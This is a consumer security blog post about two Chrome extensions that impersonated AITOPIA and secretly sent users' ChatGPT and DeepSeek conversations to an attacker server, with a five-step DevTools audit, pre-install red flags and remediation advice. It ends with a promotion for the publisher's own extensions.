STOP Extensions Stealing Your AI Chats: 5 Checks (2026)
900K users had ChatGPT & DeepSeek chats exfiltrated in 2026. How Prompt Poaching works, how to audit your extensions, and red flags before installing.
Key takeaways
- 900,000 users had AI conversations stolen by two extensions removed from the Chrome Web Store in early 2026.
- “Prompt Poaching” hides exfiltration inside a working AI assistant. Users never see anything wrong.
- A 5-step DevTools audit catches it in under 3 minutes. Open the extension’s service worker and watch the Network tab.
Your private AI conversations might already be on a server you’ve never heard of. Not hypothetically. In December 2025, two Chrome extensions with a combined 900,000 users were quietly sending every ChatGPT and DeepSeek conversation to an attacker-controlled server. Every 30 minutes, while users had no idea anything was wrong. The extensions worked perfectly. That was the point.
What Happened: The 900,000-User Attack
OX Security discovered the attack in late 2025 and disclosed it in early 2026. Two extensions were impersonating AITOPIA, a legitimate extension developer on the Chrome Web Store: “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” (600,000 installs) and “AI Sidebar with Deepseek, ChatGPT, Claude and more” (300,000 installs).
Both extensions worked as described. You could open a chat interface, interact with AI, get responses. The surface layer was real. Running underneath: a background script that read full conversation content from the page DOM and transmitted it to a command-and-control server at 30-minute intervals. Chrome tab URLs were exfiltrated alongside the chat data.
The consent mechanism was cynical. During installation, users were prompted to agree to “anonymous analytics collection.” Most people click through that. The data being sent was anything but anonymous: it was the complete text of their AI conversations.
Both extensions were removed from the Chrome Web Store after OX Security’s disclosure. By then, 900,000 accounts had been exposed for weeks to months.
| Extension A | Extension B | |
|---|---|---|
| Name | Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI | AI Sidebar with Deepseek, ChatGPT, Claude and more |
| Install count (at removal) | ~600,000 | ~300,000 |
| Impersonated | AITOPIA (legitimate extension) | AITOPIA (legitimate extension) |
| Data exfiltrated | Full chat content + all tab URLs | Full chat content + all tab URLs |
| Exfiltration frequency | Every 30 minutes | Every 30 minutes |
| Consent framing | ”Anonymous analytics" | "Anonymous analytics” |
| CWS status | Removed (early 2026) | Removed (early 2026) |
The AITOPIA impersonation detail matters. Someone who searched for AITOPIA-branded tools, saw something that looked right, and installed it had done what they were supposed to do: verify the source. The attack exploited the fact that CWS search returns results by popularity and keyword matching, not by verified publisher identity alone.
How Prompt Poaching Works
Secure Annex, who named the technique, describes it as a multi-layer deception. Understanding the layers explains why it’s so hard to spot from the inside.
The extension’s visible behavior is completely legitimate. It connects to AI APIs, renders chat interfaces, stores preferences locally. Users get a real product. This isn’t a fake extension masquerading as functionality. It’s a real extension with a hidden payload.
The exfiltration code is structurally separate from the visible functionality. In both 2026 cases, a background script ran on a timer independent of user actions. Every 30 minutes, regardless of whether the user was actively chatting, the script swept the DOM of any open AI chat tabs and packaged the content. The payload went to a domain registered specifically for the attack, not a recognizable ad analytics endpoint that might trigger suspicion.
The “analytics consent” framing is deliberate. Broad, vaguely-worded consent buried in an onboarding flow is legally useful (claimed consent) and psychologically effective (users feel they agreed to something, even if they didn’t understand what). Extensions that ask for analytics permission during install and then send conversation content can argue users consented. A weak argument, but it complicates enforcement.
What makes this attack class persistent:
-
Permissions survive updates. Once you grant
<all_urls>or host permissions for specific AI chat domains, those permissions persist through every future update. The developer can add exfiltration code to a subsequent update without triggering a new permission request. -
60% of Chrome extensions haven’t been updated in over 12 months. A legitimate, unmaintained extension with broad permissions is an attractive acquisition target. Buy it, push an update with exfiltration code, collect data from users who vetted the extension months or years ago.
-
The Chrome Web Store review process is not comprehensive. Malicious behavior disguised in otherwise-functional extensions can pass initial review. The 2026 extensions were removed after external disclosure, not caught by Google proactively.
How to Audit Your Extensions in 5 Steps
This works for any extension, not just AI tools. It takes under 3 minutes per extension.
Step 1: Open the extension’s service worker.
Go to chrome://extensions and enable Developer Mode (toggle in the top right). Find the extension you want to audit and click “service worker” or “background page.” This opens a DevTools panel connected to the extension’s background context.
Step 2: Clear the Network tab and start monitoring.
In the DevTools panel, go to the Network tab. Press the red circle (record) button if it isn’t already active. Clear existing requests with the no-entry icon. You want a clean baseline.
Step 3: Use an AI chatbot normally.
Open ChatGPT, Claude, DeepSeek, or whichever AI tool you normally use. Send a few messages. Have a real conversation, including phrases you’d never want shared. Let the page sit for a few minutes.
Step 4: Inspect what requests fired.
Look at what appeared in the Network tab. A legitimate AI assistant extension should send requests to the AI provider’s own API domain (api.openai.com, api.anthropic.com, etc.) and nowhere else. If you see requests to domains you don’t recognize, especially domains that aren’t the AI provider’s own infrastructure, that warrants investigation.
Step 5: Check request payloads.
Click on any suspicious request and look at the request body in the Payload tab. Legitimate requests to AI APIs will contain your messages in an expected API format. Requests to unknown domains containing conversation text are a strong signal of exfiltration.
An extension with zero telemetry will show no unexpected outbound requests. Zero requests to third parties is verifiable. You can confirm it yourself rather than trusting any claim the developer makes.
Red Flags Before You Install
Prevention is more practical than auditing after the fact. These patterns are common to AI extensions that turn out to be data collection tools.
| Signal | What it means |
|---|---|
Requests <all_urls> permission | Extension can read all pages you visit, not just AI chat domains |
| Vague “analytics” consent during onboarding | Common framing for exfiltration consent |
| Developer is anonymous or has no verifiable web presence | No accountability if something goes wrong |
| Extension name closely resembles a well-known tool | Name spoofing is common in impersonation attacks |
| Privacy policy uses “aggregate data” or “third-party partners” | Disclosure language for data sharing |
| Extension was recently published with high initial ratings | Fake reviews are used to surface new malicious extensions |
| No Featured badge | Google reviews Featured extensions for policy compliance — not a guarantee, but a bar |
| Extension requests permissions unrelated to its stated function | A tab manager that wants access to all URLs doesn’t need it |
The permission check is the fastest signal. When Chrome shows you the installation permission prompt, read it. <all_urls> plus the ability to read page content is a combination that gives any extension access to everything you see in the browser — including AI chat conversations.
The Broader Pattern in 2026
The Prompt Poaching attacks are not isolated. The same quarter saw 287 extensions found leaking user data, reported by The Register in February 2026. Separate from that, 36 extensions were compromised in a supply chain attack — the extensions themselves were legitimate, but their upstream dependencies or update servers were hijacked. CVE-2026-0628 allowed low-privilege extensions to inject code into Chrome’s native Gemini panel, gaining access to context those extensions never should have had.
These incidents share a common thread: the Chrome extension model gives installed software significant access to browser context, and that access can be exploited in ways that aren’t visible to the user during normal operation.
The 52% figure from Incogni’s research (more than half of AI-powered Chrome extensions collect user data) isn’t shocking in this context. It’s structural. Extensions that wrap AI chat interfaces need broad host permissions to function. Those same permissions enable data collection. The difference between a legitimate extension that uses those permissions for its stated purpose and one that uses them for exfiltration is invisible from the user’s side without a DevTools audit.
Fewer Extensions, Better Hygiene
Every extension you install is a trust decision that persists until you reverse it. The safest approach to AI chat privacy is the simplest: use AI tools directly in their own tabs rather than through an extension layer. ChatGPT, Claude, and DeepSeek all work in a browser tab without a sidebar extension. The extension layer adds convenience. It also adds an attack surface.
If you do use AI extensions, the checklist above (permissions audit, DevTools network monitor, developer verification) takes under 5 minutes total and catches the pattern that affected 900,000 users in 2026.
Separately from AI chat risks, the extensions you already have installed shape your browser’s exposure to tracking and data collection. SuperchargePerformance blocks 186,000+ tracking, advertising, and analytics rules from 22 verified open-source blocklists. That includes the category of analytics endpoints that exfiltration attacks often route data through. It runs 100% locally, has zero telemetry, requires no account, and carries the Featured badge on the Chrome Web Store — meaning Google has reviewed it for policy compliance. SuperchargeNavigation, the companion extension for tab and workspace management, uses the same architecture: everything local, nothing transmitted, no external dependencies.
Neither extension requires trusting any claim about data handling. The zero telemetry is verifiable in DevTools the same way the audit steps above are.
What to Do If You Had Either Affected Extension
If you installed either of the removed extensions — “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” or “AI Sidebar with Deepseek, ChatGPT, Claude and more” — there are a few concrete steps worth taking.
Remove the extension immediately if it’s still installed. On Chrome 146, go to chrome://extensions and click Remove. This stops any ongoing exfiltration, though it doesn’t affect data already sent.
Review your AI chat history. ChatGPT, Claude, and DeepSeek all maintain conversation history in your account. Look for any sessions that seem unusual or that you don’t recognize, as a sign that account access may have been shared.
Check for account access you didn’t grant. Any service where you used AI tools while the malicious extension was active should be reviewed. API keys in particular: if your ChatGPT API key was visible in any chat session, rotate it.
If you granted the “anonymous analytics” consent during installation, consider whether any conversations contained sensitive professional or personal information. The data was sent to a server you have no visibility into. Treat those conversations as compromised.
The 900,000-user figure is large enough that this isn’t a niche concern. If you’ve installed AI assistant extensions in the past six months, running the 5-step audit above is worth the three minutes it takes.
Frequently Asked Questions
Can Chrome extensions read my ChatGPT or Claude conversations?
What is Prompt Poaching?
How do I check if an extension is stealing my AI conversations?
Which Chrome extensions were caught stealing AI conversations in 2026?
Is it safe to use AI extensions in Chrome?
SuperchargePerformance
Tab suspension, ad blocking, and script control. Free.
Don't miss the next release
Be first to know when we ship something new.
Related Articles
Privacy Extensions That Steal Data: How to STOP Them (2026)
Fake AI extensions stole 900K users' chat history in 2026. What zero telemetry actually means, and how to verify any privacy extension before you install it.
Chrome Extensions Using Too Much RAM? 5 Tested Fixes (2026)
Extensions inject into every tab: 15 tabs means 15× the footprint. Shift+Esc reveals the culprits. 5 tested fixes to cut Chrome extension RAM in minutes.
AI Tab Organizer vs Tab Manager: 6 TESTED (2026)
6 AI tab organizers tested on CWS vs real tab managers. AI groups by content. You work by project. That gap costs more than you think. Real comparison inside.
5 BEST Ad Blockers for Chrome in 2026 (MV3 Compared)
MV2 died in 2025. uBlock Origin, AdGuard, and others migrated to MV3 and still block ads. We compared 5 Chrome ad blockers on rules, RAM, and privacy.